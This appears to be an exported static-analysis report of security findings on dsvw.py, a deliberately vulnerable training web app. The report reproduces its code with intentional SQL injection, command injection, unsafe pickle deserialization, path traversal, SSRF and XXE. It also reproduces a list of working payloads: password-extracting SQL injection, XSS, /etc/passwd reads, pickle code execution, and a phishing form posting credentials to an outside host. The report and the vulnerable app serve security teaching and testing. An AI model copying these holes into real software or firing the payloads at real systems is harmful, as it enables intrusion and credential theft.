FINDING_1

Responsibility
Not trustworthy
"password" detected here, review this potentially hard-coded credential.

Credentials should not be hard-coded python:S2068
Software qualities impacted:
Security


1
Blocker
Open
Not assigned
Vulnerability
Blocker


Where is the issue?
Why is this an issue?
How can I fix it?
Activity
More info

Open in IDE
/dsvw.py


See all issues in this file
#!/usr/bin/env python3
import html, http.client, http.server, io, json, os, pickle, random, re, socket, socketserver, sqlite3, string, sys, subprocess, time, traceback, urllib.parse, urllib.request, xml.etree.ElementTree  # Python 3 required
try:
    import lxml.etree
except ImportError:
    print("[!] please install 'python-lxml' to (also) get access to XML vulnerabilities (e.g. '%s')\n" % ("apt-get install python-lxml" if os.name != "nt" else "https://pypi.python.org/pypi/lxml"))
NAME, VERSION, GITHUB, AUTHOR, LICENSE = "Damn Small Vulnerable Web (DSVW) < 100 LoC (Lines of Code)", "0.4", "https://github.com/stamparm/DSVW", "Miroslav Stampar (@stamparm)", "Unlicense (public domain)"
LISTEN_ADDRESS, LISTEN_PORT = "127.0.0.1", 65412
HTML_PREFIX, HTML_POSTFIX = "<!DOCTYPE html>\n<html>\n<head>\n<style>a {font-weight: bold; text-decoration: none; visited: blue; color: blue;} ul {display: inline-block;} .disabled {text-decoration: line-through; color: gray} .disabled a {visited: gray; color: gray; pointer-events: none; cursor: default} table {border-collapse: collapse; margin: 12px; border: 2px solid black} th, td {border: 1px solid black; padding: 3px} span {font-size: larger; font-weight: bold}</style>\n<title>%s</title>\n</head>\n<body style='font: 12px monospace'>\n<script>function process(data) {alert(\"Surname(s) from JSON results: \" + Object.keys(data).map(function(k) {return data[k]}));}; var index=document.location.hash.indexOf('lang='); if (index != -1) document.write('<div style=\"position: absolute; top: 5px; right: 5px;\">Chosen language: <b>' + decodeURIComponent(document.location.hash.substring(index + 5)) + '</b></div>');</script>\n" % html.escape(NAME), "<div style=\"position: fixed; bottom: 5px; text-align: center; width: 100%%;\">Powered by <a href=\"%s\" style=\"font-weight: bold; text-decoration: none; visited: blue; color: blue\" target=\"_blank\">%s</a> (v<b>%s</b>)</div>\n</body>\n</html>" % (GITHUB, re.search(r"\(([^)]+)", NAME).group(1), VERSION)
USERS_XML = """<?xml version="1.0" encoding="utf-8"?><users><user id="0"><username>admin</username><name>admin</name><surname>admin</surname><password>7en8aiDoh!</password></user><user id="1"><username>dricci</username><name>dian</name><surname>ricci</surname><password>12345</password></user><user id="2"><username>amason</username><name>anthony</name><surname>mason</surname><password>gandalf</password></user><user id="3"><username>svargas</username><name>sandra</name><surname>vargas</surname><password>phest1945</password></user></users>"""
CASES = (("Blind SQL Injection (<i>boolean</i>)", "?id=2", "/?id=2%20AND%20SUBSTR((SELECT%20password%20FROM%20users%20WHERE%20name%3D%27admin%27)%2C1%2C1)%3D%277%27\" onclick=\"alert('checking if the first character for admin\\'s password is digit \\'7\\' (true in case of same result(s) as for \\'vulnerable\\')')", "https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/05-Testing_for_SQL_Injection#boolean-exploitation-technique"), ("Blind SQL Injection (<i>time</i>)", "?id=2", "/?id=(SELECT%20(CASE%20WHEN%20(SUBSTR((SELECT%20password%20FROM%20users%20WHERE%20name%3D%27admin%27)%2C2%2C1)%3D%27e%27)%20THEN%20(LIKE(%27ABCDEFG%27%2CUPPER(HEX(RANDOMBLOB(300000000)))))%20ELSE%200%20END))\" onclick=\"alert('checking if the second character for admin\\'s password is letter \\'e\\' (true in case of delayed response)')", "https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/05-Testing_for_SQL_Injection#time-delay-exploitation-technique"), ("UNION SQL Injection", "?id=2", "/?id=2%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20(SELECT%20id%7C%7C%27%2C%27%7C%7Cusername%7C%7C%27%2C%27%7C%7Cpassword%20FROM%20users%20WHERE%20username%3D%27admin%27)", "https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/05-Testing_for_SQL_Injection#union-exploitation-technique"), ("Login Bypass", "/login?username=&amp;password=", "/login?username=admin&amp;password=%27%20OR%20%271%27%20LIKE%20%271", "https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/05-Testing_for_SQL_Injection#classic-sql-injection"), ("HTTP Parameter Pollution", "/login?username=&amp;password=", "/login?username=admin&amp;password=%27%2F*&amp;password=*%2FOR%2F*&amp;password=*%2F%271%27%2F*&amp;password=*%2FLIKE%2F*&amp;password=*%2F%271", "https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/04-Testing_for_HTTP_Parameter_Pollution"), ("Cross Site Scripting (<i>reflected</i>)", "/?v=0.4", "/?v=0.4%3Cscript%3Ealert(%22arbitrary%20javascript%22)%3C%2Fscript%3E", "https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/01-Testing_for_Reflected_Cross_Site_Scripting"), ("Cross Site Scripting (<i>stored</i>)", "/?comment=\" onclick=\"document.location='/?comment='+prompt('please leave a comment'); return false", "/?comment=%3Cscript%3Ealert(%22arbitrary%20javascript%22)%3C%2Fscript%3E", "https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/02-Testing_for_Stored_Cross_Site_Scripting"), ("Cross Site Scripting (<i>DOM</i>)", "/?#lang=en", "/?foobar#lang=en%3Cscript%3Ealert(%22arbitrary%20javascript%22)%3C%2Fscript%3E", "https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/11-Client-side_Testing/01-Testing_for_DOM-based_Cross_Site_Scripting"), ("Cross Site Scripting (<i>JSONP</i>)", "/users.json?callback=process\" onclick=\"var script=document.createElement('script');script.src='/users.json?callback=process';document.getElementsByTagName('head')[0].appendChild(script);return false", "/users.json?callback=alert(%22arbitrary%20javascript%22)%3Bprocess\" onclick=\"var script=document.createElement('script');script.src='/users.json?callback=alert(%22arbitrary%20javascript%22)%3Bprocess';document.getElementsByTagName('head')[0].appendChild(script);return false", "http://www.metaltoad.com/blog/using-jsonp-safely"), ("XML External Entity (<i>local</i>)", "/?xml=%3Croot%3E%3C%2Froot%3E", "/?xml=%3C!DOCTYPE%20example%20%5B%3C!ENTITY%20xxe%20SYSTEM%20%22file%3A%2F%2F%2Fetc%2Fpasswd%22%3E%5D%3E%3Croot%3E%26xxe%3B%3C%2Froot%3E" if os.name != "nt" else "/?xml=%3C!DOCTYPE%20example%20%5B%3C!ENTITY%20xxe%20SYSTEM%20%22file%3A%2F%2FC%3A%2FWindows%2Fwin.ini%22%3E%5D%3E%3Croot%3E%26xxe%3B%3C%2Froot%3E", "https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/07-Testing_for_XML_Injection"), ("XML External Entity (<i>remote</i>)", "/?xml=%3Croot%3E%3C%2Froot%3E", "/?xml=%3C!DOCTYPE%20example%20%5B%3C!ENTITY%20xxe%20SYSTEM%20%22http%3A%2F%2Fhttpbin.org%2Fbase64%2FSGVsbG8sIFdvcmxkIQ%3D%3D%22%3E%5D%3E%3Croot%3E%26xxe%3B%3C%2Froot%3E", "https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/07-Testing_for_XML_Injection"), ("Server Side Request Forgery", "/?path=", "/?path=http%3A%2F%2F127.0.0.1%3A631" if os.name != "nt" else "/?path=%5C%5C127.0.0.1%5CC%24%5CWindows%5Cwin.ini", "http://www.bishopfox.com/blog/2015/04/vulnerable-by-design-understanding-server-side-request-forgery/"), ("Blind XPath Injection (<i>boolean</i>)", "/?name=dian", "/?name=admin%27%20and%20substring(password%2Ftext()%2C3%2C1)%3D%27n\" onclick=\"alert('checking if the third character for admin\\'s password is letter \\'n\\' (true in case of found item)')", "https://owasp.org/www-community/attacks/XPATH_Injection"), ("Cross Site Request Forgery", "/?comment=", "/?v=%3Cimg%20src%3D%22%2F%3Fcomment%3D%253Cdiv%2520style%253D%2522color%253Ared%253B%2520font-weight%253A%2520bold%2522%253EI%2520quit%2520the%2520job%253C%252Fdiv%253E%22%3E\" onclick=\"alert('please visit \\'vulnerable\\' page to see what this click has caused')", "https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/06-Session_Management_Testing/05-Testing_for_Cross_Site_Request_Forgery"), ("Frame Injection (<i>phishing</i>)", "/?v=0.4", "/?v=0.4%3Ciframe%20src%3D%22https%3A%2F%2Fdemo.sekuripy.hr%2Fdsvw%2Flogin.html%22%20style%3D%22background-color%3Awhite%3Bz-index%3A10%3Btop%3A10%25%3Bleft%3A10%25%3Bposition%3Afixed%3Bborder-collapse%3Acollapse%3Bborder%3A1px%20solid%20%23a8a8a8%22%3E%3C%2Fiframe%3E", "http://www.gnucitizen.org/blog/frame-injection-fun/"), ("Frame Injection (<i>content spoofing</i>)", "/?v=0.4", "/?v=0.4%3Ciframe%20src%3D%22https%3A%2F%2Fdemo.sekuripy.hr%2Fdsvw%2Fframe.html%22%20style%3D%22background-color%3Awhite%3Bwidth%3A100%25%3Bheight%3A100%25%3Bz-index%3A10%3Btop%3A0%3Bleft%3A0%3Bposition%3Afixed%3B%22%20frameborder%3D%220%22%3E%3C%2Fiframe%3E", "http://www.gnucitizen.org/blog/frame-injection-fun/"), ("Clickjacking", None, "/?v=0.4%3Cdiv%20style%3D%22opacity%3A0%3Bfilter%3Aalpha(opacity%3D20)%3Bbackground-color%3A%23000%3Bwidth%3A100%25%3Bheight%3A100%25%3Bz-index%3A10%3Btop%3A0%3Bleft%3A0%3Bposition%3Afixed%3B%22%20onclick%3D%22document.location%3D%27https%3A%2F%2Fdemo.sekuripy.hr%2Fdsvw%2Fclickjacking.html%27%22%3E%3C%2Fdiv%3E%3Cscript%3Ealert(%22click%20anywhere%20on%20page%22)%3B%3C%2Fscript%3E", "https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/11-Client-side_Testing/09-Testing_for_Clickjacking"), ("Unvalidated Redirect", "/?redir=", "/?redir=https%3A%2F%2Fgeekprank.com%2F", "https://cheatsheetseries.owasp.org/cheatsheets/Unvalidated_Redirects_and_Forwards_Cheat_Sheet.html"), ("Arbitrary Code Execution", "/?domain=www.google.com", "/?domain=www.google.com%3B%20ifconfig" if os.name != "nt" else "/?domain=www.google.com%26%20ipconfig", "https://en.wikipedia.org/wiki/Arbitrary_code_execution"), ("Full Path Disclosure", "/?path=", "/?path=foobar", "https://owasp.org/www-community/attacks/Full_Path_Disclosure"), ("Source Code Disclosure", "/?path=", "/?path=dsvw.py", "https://www.imperva.com/resources/glossary?term=source_code_disclosure"), ("Path Traversal", "/?path=", "/?path=..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd" if os.name != "nt" else "/?path=..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini", "https://www.owasp.org/index.php/Path_Traversal"), ("File Inclusion (<i>remote</i>)", "/?include=", "/?include=https%%3A%%2F%%2Fpastebin.com%%2Fraw%%2F6VyyNNhc&amp;cmd=%s" % ("ifconfig" if os.name != "nt" else "ipconfig"), "https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/11.2-Testing_for_Remote_File_Inclusion"), ("HTTP Header Injection (<i>phishing</i>)", "/?charset=utf8", "/?charset=utf8%0D%0AX-XSS-Protection:0%0D%0AContent-Length:388%0D%0A%0D%0A%3C!DOCTYPE%20html%3E%3Chtml%3E%3Chead%3E%3Ctitle%3ELogin%3C%2Ftitle%3E%3C%2Fhead%3E%3Cbody%20style%3D%27font%3A%2012px%20monospace%27%3E%3Cform%20action%3D%22http%3A%2F%2Fdsvw.c1.biz%2Fi%2Flog.php%22%20onSubmit%3D%22alert(%27visit%20%5C%27http%3A%2F%2Fdsvw.c1.biz%2Fi%2Flog.txt%5C%27%20to%20see%20your%20phished%20credentials%27)%22%3EUsername%3A%3Cbr%3E%3Cinput%20type%3D%22text%22%20name%3D%22username%22%3E%3Cbr%3EPassword%3A%3Cbr%3E%3Cinput%20type%3D%22password%22%20name%3D%22password%22%3E%3Cinput%20type%3D%22submit%22%20value%3D%22Login%22%3E%3C%2Fform%3E%3C%2Fbody%3E%3C%2Fhtml%3E", "https://www.rapid7.com/db/vulnerabilities/http-generic-script-header-injection"), ("Component with Known Vulnerability (<i>pickle</i>)", "/?object=%s" % urllib.parse.quote(pickle.dumps(dict((_.findtext("username"), (_.findtext("name"), _.findtext("surname"))) for _ in xml.etree.ElementTree.fromstring(USERS_XML).findall("user")))), "/?object=cos%%0Asystem%%0A(S%%27%s%%27%%0AtR.%%0A\" onclick=\"alert('checking if arbitrary code can be executed remotely (true in case of delayed response)')" % urllib.parse.quote("ping -c 5 127.0.0.1" if os.name != "nt" else "ping -n 5 127.0.0.1"), "https://www.cs.uic.edu/~s/musings/pickle.html"), ("Denial of Service (<i>memory</i>)", "/?size=32", "/?size=9999999", "https://owasp.org/www-community/attacks/Denial_of_Service"))
"password" detected here, review this potentially hard-coded credential.

Hard-coding credentials in source code or binaries makes it easy for attackers to extract sensitive information, especially in distributed or open-source applications. This practice exposes your application to significant security risks.

This rule flags instances of hard-coded credentials used in database and LDAP connections. It looks for hard-coded credentials in connection strings, and for variable names that match any of the patterns from the provided list.

In the past, it has led to the following vulnerabilities:

CVE-2019-13466
CVE-2018-15389

Responsibility
Not trustworthy
"password" detected here, review this potentially hard-coded credential.

Credentials should not be hard-coded python:S2068
Software qualities impacted:
Security


1
Blocker
Open
Not assigned
Vulnerability
Blocker
Tags
cwe
+
Line affected
L12
Effort
30 min
Introduced
2 months ago
Where is the issue?
Why is this an issue?
How can I fix it?
Activity
More info

Open in IDE
Resources
OWASP - Top 10 2021 Category A7 - Identification and Authentication Failures
OWASP - Top 10 2017 Category A2 - Broken Authentication
CWE - CWE-798 - Use of Hard-coded Credentials
CWE - CWE-259 - Use of Hard-coded Password
Derived from FindSecBugs rule Hard Coded Password

________________________________________________________________________________________
FINDING_2
Change this code to not deserialize user-controlled data.

Deserialization should not be vulnerable to injection attacks pythonsecurity:S5135
Software qualities impacted:
Security


1
Blocker
Open
Not assigned
Vulnerability
Blocker
Tags
cwe
+
Line affected
L35
Effort
30 min
Introduced
6 years ago


/dsvw.py


See all issues in this file


*


Show 19 more lines
    cursor.executemany("INSERT INTO users(id, username, name, surname, password) VALUES(NULL, ?, ?, ?, ?)", ((_.findtext("username"), _.findtext("name"), _.findtext("surname"), _.findtext("password")) for _ in xml.etree.ElementTree.fromstring(USERS_XML).findall("user")))
    cursor.execute("CREATE TABLE comments(id INTEGER PRIMARY KEY AUTOINCREMENT, comment TEXT, time TEXT)")
class ReqHandler(http.server.BaseHTTPRequestHandler):
    def do_GET(self):
        
5
path, 
4
query = 
1
2
3
self.path.split('?', 1) if '?' in self.path else (self.path, "")
        
12
code, content, params, cursor = http.client.OK, HTML_PREFIX, 
11
dict(
10
(match.group("parameter"), 
9
urllib.parse.unquote(
8
','.join(
7
re.findall(r"(?:\A|[?&])%s=([^&]+)" % match.group("parameter"), query)))) for match in 
6
re.finditer(r"((\A|[?&])(?P<parameter>[\w\[\]]+)=)([^&]+)", query)), connection.cursor()
        try:
            if path == '/':
                if "id" in params:
                    cursor.execute("SELECT id, username, name, surname FROM users WHERE id=" + params["id"])
                    content += "<div><span>Result(s):</span></div><table><thead><th>id</th><th>username</th><th>name</th><th>surname</th></thead>%s</table>%s" % ("".join("<tr>%s</tr>" % "".join("<td>%s</td>" % ("-" if _ is None else _) for _ in row) for row in cursor.fetchall()), HTML_POSTFIX)
                elif "v" in params:
                    content += re.sub(r"(v<b>)[^<]+(</b>)", r"\g<1>%s\g<2>" % params["v"], HTML_POSTFIX)
                elif "object" in params:
                    content = str(
15
pickle.loads(
13
14
params["object"].encode()))
Change this code to not deserialize user-controlled data.


Change this code to not deserialize user-controlled data.

Deserialization should not be vulnerable to injection attacks pythonsecurity:S5135
Software qualities impacted:
Security


1
Blocker
Open
Not assigned
Vulnerability
Blocker
Tags
cwe
+
Line affected
L35
Effort
30 min
Introduced
6 years ago
Where is the issue?
Why is this an issue?
How can I fix it?
Activity
More info

Open in IDE
Resources
Standards
OWASP - Top 10 2021 Category A8 - Software and Data Integrity Failures
OWASP - Top 10 2017 Category A8 - Insecure Deserialization
CWE - CWE-20 - Improper Input Validation
CWE - CWE-502 - Deserialization of Untrusted Data
STIG Viewer - Application Security and Development: V-222609 - The application must not be subject to input handling vulnerabilities.


________________________________________________________________________________________
FINDING_3
Change this code to not construct the path from user-controlled data.

I/O function calls should not be vulnerable to path injection attacks pythonsecurity:S2083
Software qualities impacted:
Security


1
Blocker
Open
Not assigned
Vulnerability
Blocker


Where is the issue?
Why is this an issue?
How can I fix it?
Activity
More info

Open in IDE
/dsvw.py


See all issues in this file


*


Show 19 more lines
    cursor.executemany("INSERT INTO users(id, username, name, surname, password) VALUES(NULL, ?, ?, ?, ?)", ((_.findtext("username"), _.findtext("name"), _.findtext("surname"), _.findtext("password")) for _ in xml.etree.ElementTree.fromstring(USERS_XML).findall("user")))
    cursor.execute("CREATE TABLE comments(id INTEGER PRIMARY KEY AUTOINCREMENT, comment TEXT, time TEXT)")
class ReqHandler(http.server.BaseHTTPRequestHandler):
    def do_GET(self):
        
5
path, 
4
query = 
1
2
3
self.path.split('?', 1) if '?' in self.path else (self.path, "")
        
12
code, content, params, cursor = http.client.OK, HTML_PREFIX, 
11
dict(
10
(match.group("parameter"), 
9
urllib.parse.unquote(
8
','.join(
7
re.findall(r"(?:\A|[?&])%s=([^&]+)" % match.group("parameter"), query)))) for match in 
6
re.finditer(r"((\A|[?&])(?P<parameter>[\w\[\]]+)=)([^&]+)", query)), connection.cursor()
        try:
            if path == '/':
                if "id" in params:
                    cursor.execute("SELECT id, username, name, surname FROM users WHERE id=" + params["id"])
                    content += "<div><span>Result(s):</span></div><table><thead><th>id</th><th>username</th><th>name</th><th>surname</th></thead>%s</table>%s" % ("".join("<tr>%s</tr>" % "".join("<td>%s</td>" % ("-" if _ is None else _) for _ in row) for row in cursor.fetchall()), HTML_POSTFIX)
                elif "v" in params:
                    content += re.sub(r"(v<b>)[^<]+(</b>)", r"\g<1>%s\g<2>" % params["v"], HTML_POSTFIX)
                elif "object" in params:
                    content = str(pickle.loads(params["object"].encode()))
                elif "path" in params:
                    content = (
15
open(
14
os.path.abspath(
13
params["path"]), "rb") if not "://" in params["path"] else urllib.request.urlopen(params["path"])).read().decode()
Change this code to not construct the path from user-controlled data.

                elif "domain" in params:
                    content = subprocess.run("nslookup " + params["domain"], shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, stdin=subprocess.PIPE, text=True).stdout
                elif "xml" in params:
                    content = lxml.etree.tostring(lxml.etree.parse(io.BytesIO(params["xml"].encode()), lxml


                    Where is the issue?
Why is this an issue?
How can I fix it?
Activity
More info

Open in IDE
Resources
Standards
OWASP - Top 10 2021 Category A1 - Broken Access Control
OWASP - Top 10 2021 Category A3 - Injection
OWASP - Top 10 2017 Category A1 - Injection
OWASP - Top 10 2017 Category A5 - Broken Access Control
CWE - CWE-20 - Improper Input Validation
CWE - CWE-22 - Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
STIG Viewer - Application Security and Development: V-222609 - The application must not be subject to input handling vulnerabilities.
Code principles
Never trust user input
Applications must treat all user input and, more generally, all third-party data as attacker-controlled data.

The application must determine where the third-party data comes from and treat that data source as an attack vector. Two rules apply:

First, before using it in the application's business logic, the application must validate the attacker-controlled data against predefined formats, such as:

Character sets
Sizes
Types
Or any strict schema
Second, the application must sanitize string data before inserting it into interpreted contexts (client-side code, file paths, SQL queries). Unsanitized code can corrupt the application's logic.

Defense-in-depth
Applications and infrastructure benefit greatly from relying on multiple security mechanisms layered on top of each other. If one security mechanism fails, there is a high probability that the subsequent layers of security will successfully defend against the attack.

A non-exhaustive list of these code protection ramparts includes the following:

Minimizing the attack surface of the code
Application of the principle of least privilege
Validation and sanitization of data
Encrypting incoming, outgoing, or stored data with secure cryptography
Ensuring that internal errors cannot disrupt the overall runtime
Separation of tasks and access to information
Note that these layers must be simple enough to use in an everyday workflow. Security measures should not break usability.



________________________________________________________________________________________
FINDING_4
Change this code to not construct the URL from user-controlled data.

Server-side requests should not be vulnerable to forging attacks pythonsecurity:S5144
Software qualities impacted:
Security


2
Medium
Open
Not assigned
Vulnerability
Major
Tags
cwe
+
Line affected
L37
Effort
30 min
Introduced
6 years ago
Where is the issue?
Why is this an issue?
How can I fix it?
Activity
More info

Open in IDE
/dsvw.py


See all issues in this file


*


Show 19 more lines
    cursor.executemany("INSERT INTO users(id, username, name, surname, password) VALUES(NULL, ?, ?, ?, ?)", ((_.findtext("username"), _.findtext("name"), _.findtext("surname"), _.findtext("password")) for _ in xml.etree.ElementTree.fromstring(USERS_XML).findall("user")))
    cursor.execute("CREATE TABLE comments(id INTEGER PRIMARY KEY AUTOINCREMENT, comment TEXT, time TEXT)")
class ReqHandler(http.server.BaseHTTPRequestHandler):
    def do_GET(self):
        
5
path, 
4
query = 
1
2
3
self.path.split('?', 1) if '?' in self.path else (self.path, "")
        
12
code, content, params, cursor = http.client.OK, HTML_PREFIX, 
11
dict(
10
(match.group("parameter"), 
9
urllib.parse.unquote(
8
','.join(
7
re.findall(r"(?:\A|[?&])%s=([^&]+)" % match.group("parameter"), query)))) for match in 
6
re.finditer(r"((\A|[?&])(?P<parameter>[\w\[\]]+)=)([^&]+)", query)), connection.cursor()
        try:
            if path == '/':
                if "id" in params:
                    cursor.execute("SELECT id, username, name, surname FROM users WHERE id=" + params["id"])
                    content += "<div><span>Result(s):</span></div><table><thead><th>id</th><th>username</th><th>name</th><th>surname</th></thead>%s</table>%s" % ("".join("<tr>%s</tr>" % "".join("<td>%s</td>" % ("-" if _ is None else _) for _ in row) for row in cursor.fetchall()), HTML_POSTFIX)
                elif "v" in params:
                    content += re.sub(r"(v<b>)[^<]+(</b>)", r"\g<1>%s\g<2>" % params["v"], HTML_POSTFIX)
                elif "object" in params:
                    content = str(pickle.loads(params["object"].encode()))
                elif "path" in params:
                    content = (open(os.path.abspath(params["path"]), "rb") if not "://" in params["path"] else 
14
urllib.request.urlopen(
13
params["path"])).read().decode()
Change this code to not construct the URL from user-controlled data.

                elif "domain" in params:
                    content = subprocess.run("nslookup " + params["domain"], shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, stdin=subprocess.PIPE, text=True).stdout
                elif "xml" in params:
                    content = lxml.etree.tostring(lxml.etree.parse(io.BytesIO(params["xml"].encode()), lxml.etree.XMLParser(load_dtd=True, resolve_entities=True, no_network=False)), pretty_print=True).decode()
                elif "name" in params:
                    found = lxml.etree.parse(io.BytesIO(USERS_XML.encode())).xpath(".//user[name/text()='%s']" % params["name"])
                    content += "<b>Surname:</b> %s%s" % (found[-1].find("surname").text if found else "-", HTML_POSTFIX)
                elif "size" in params:
                    start, _ = time.time(), "<br>".join("#" * int(params["size"]) for _ in range(int(params["size"])))


Show 53 more lines

Change this code to not construct the URL from user-controlled data.

Server-side requests should not be vulnerable to forging attacks pythonsecurity:S5144
Software qualities impacted:
Security


2
Medium
Open
Not assigned
Vulnerability
Major
Tags
cwe
+
Line affected
L37
Effort
30 min
Introduced
6 years ago
Where is the issue?
Why is this an issue?
How can I fix it?
Activity
More info

Open in IDE
Resources
Standards
OWASP - Top 10 2021 Category A10 - Server-Side Request Forgery (SSRF)
OWASP - Top 10 2017 Category A5 - Broken Access Control
CWE - CWE-20 - Improper Input Validation
CWE - CWE-918 - Server-Side Request Forgery (SSRF)
STIG Viewer - Application Security and Development: V-222609 - The application must not be subject to input handling vulnerabilities.
Code principles
Never trust user input
Applications must treat all user input and, more generally, all third-party data as attacker-controlled data.

The application must determine where the third-party data comes from and treat that data source as an attack vector. Two rules apply:

First, before using it in the application's business logic, the application must validate the attacker-controlled data against predefined formats, such as:

Character sets
Sizes
Types
Or any strict schema
Second, the application must sanitize string data before inserting it into interpreted contexts (client-side code, file paths, SQL queries). Unsanitized code can corrupt the application's logic.

Defense-in-depth
Applications and infrastructure benefit greatly from relying on multiple security mechanisms layered on top of each other. If one security mechanism fails, there is a high probability that the subsequent layers of security will successfully defend against the attack.

A non-exhaustive list of these code protection ramparts includes the following:

Minimizing the attack surface of the code
Application of the principle of least privilege
Validation and sanitization of data
Encrypting incoming, outgoing, or stored data with secure cryptography
Ensuring that internal errors cannot disrupt the overall runtime
Separation of tasks and access to information
Note that these layers must be simple enough to use in an everyday workflow. Security measures should not break usability.



________________________________________________________________________________________

FINDING_5
Change this code to not construct the OS command from user-controlled data.

OS commands should not be vulnerable to command injection attacks pythonsecurity:S2076
Software qualities impacted:
Security


1
Blocker
Open
Not assigned
Vulnerability
Blocker
Tags
cwe
+
Line affected
L39
Effort
30 min
Introduced
5 months ago
Where is the issue?
Why is this an issue?
How can I fix it?
Activity
More info

Open in IDE
/dsvw.py


See all issues in this file


*


Show 19 more lines
    cursor.executemany("INSERT INTO users(id, username, name, surname, password) VALUES(NULL, ?, ?, ?, ?)", ((_.findtext("username"), _.findtext("name"), _.findtext("surname"), _.findtext("password")) for _ in xml.etree.ElementTree.fromstring(USERS_XML).findall("user")))
    cursor.execute("CREATE TABLE comments(id INTEGER PRIMARY KEY AUTOINCREMENT, comment TEXT, time TEXT)")
class ReqHandler(http.server.BaseHTTPRequestHandler):
    def do_GET(self):
        
5
path, 
4
query = 
1
2
3
self.path.split('?', 1) if '?' in self.path else (self.path, "")
        
12
code, content, params, cursor = http.client.OK, HTML_PREFIX, 
11
dict(
10
(match.group("parameter"), 
9
urllib.parse.unquote(
8
','.join(
7
re.findall(r"(?:\A|[?&])%s=([^&]+)" % match.group("parameter"), query)))) for match in 
6
re.finditer(r"((\A|[?&])(?P<parameter>[\w\[\]]+)=)([^&]+)", query)), connection.cursor()
        try:
            if path == '/':
                if "id" in params:
                    cursor.execute("SELECT id, username, name, surname FROM users WHERE id=" + params["id"])
                    content += "<div><span>Result(s):</span></div><table><thead><th>id</th><th>username</th><th>name</th><th>surname</th></thead>%s</table>%s" % ("".join("<tr>%s</tr>" % "".join("<td>%s</td>" % ("-" if _ is None else _) for _ in row) for row in cursor.fetchall()), HTML_POSTFIX)
                elif "v" in params:
                    content += re.sub(r"(v<b>)[^<]+(</b>)", r"\g<1>%s\g<2>" % params["v"], HTML_POSTFIX)
                elif "object" in params:
                    content = str(pickle.loads(params["object"].encode()))
                elif "path" in params:
                    content = (open(os.path.abspath(params["path"]), "rb") if not "://" in params["path"] else urllib.request.urlopen(params["path"])).read().decode()
                elif "domain" in params:
                    content = 
15
subprocess.run(
14
"nslookup " + 
13
params["domain"], shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, stdin=subprocess.PIPE, text=True).stdout
Change this code to not construct the OS command from user-controlled data.

                elif "xml" in params:
                    content = lxml.etree.tostring(lxml.etree.parse(io.BytesIO(params["xml"].encode()), lxml.etree.XMLParser(load_dtd=True, resolve_entities=True, no_network=False)), pretty_print=True).decode()
                elif "name" in params:
                    found = lxml.etree.parse(io.BytesIO(USERS_XML.encode())).xpath(".//user[name/text()='%s']" % params["name"])
                    content += "<b>Surname:</b> %s%s" % (found[-1].find("surname").text if found else "-", HTML_POSTFIX)
                elif "size" in params:
                    start, _ = time.time(), "<br>".join("#" * int(params["size"]) for _ in range(int(params["size"])))
                    content += "<b>Time required</b> (to 'resize image' to %dx%d): %.6f seconds%s" % (int(params["size"]), int(params["size"]), time.time() - start, HTML_POSTFIX)
                elif "comment" in params or query == "comment=":


Show 51 more linesChange this code to not construct the OS command from user-controlled data.

OS commands should not be vulnerable to command injection attacks pythonsecurity:S2076
Software qualities impacted:
Security


1
Blocker
Open
Not assigned
Vulnerability
Blocker
Tags
cwe
+
Line affected
L39
Effort
30 min
Introduced
5 months ago
Where is the issue?
Why is this an issue?
How can I fix it?
Activity
More info

Open in IDE
Resources
Documentation
OWASP - OS Command Injection Defense Cheat Sheet
GTFOBins - list of Unix binaries that can be used to bypass local security restrictions
LOLBAS - list of Windows binaries that can be used to bypass local security restrictions
PEP 324 – subprocess - New process module
Standards
OWASP - Top 10 2021 Category A3 - Injection
OWASP - Top 10 2017 Category A1 - Injection
CWE - CWE-20 - Improper Input Validation
CWE - CWE-78 - Improper Neutralization of Special Elements used in an OS Command
STIG Viewer - Application Security and Development: V-222604 - The application must protect from command injection.
STIG Viewer - Application Security and Development: V-222609 - The application must not be subject to input handling vulnerabilities.
Code principles
Never trust user input
Applications must treat all user input and, more generally, all third-party data as attacker-controlled data.

The application must determine where the third-party data comes from and treat that data source as an attack vector. Two rules apply:

First, before using it in the application's business logic, the application must validate the attacker-controlled data against predefined formats, such as:

Character sets
Sizes
Types
Or any strict schema
Second, the application must sanitize string data before inserting it into interpreted contexts (client-side code, file paths, SQL queries). Unsanitized code can corrupt the application's logic.

Defense-in-depth
Applications and infrastructure benefit greatly from relying on multiple security mechanisms layered on top of each other. If one security mechanism fails, there is a high probability that the subsequent layers of security will successfully defend against the attack.

A non-exhaustive list of these code protection ramparts includes the following:

Minimizing the attack surface of the code
Application of the principle of least privilege
Validation and sanitization of data
Encrypting incoming, outgoing, or stored data with secure cryptography
Ensuring that internal errors cannot disrupt the overall runtime
Separation of tasks and access to information
Note that these layers must be simple enough to use in an everyday workflow. Security measures should not break usability.


________________________________________________________________________________________

FINDING_6


isable access to external entities in XML parsing.

XML parsers should not be vulnerable to XXE attacks python:S2755
Software qualities impacted:
Security


1
Blocker
Open
Not assigned
Vulnerability
Blocker
Tags
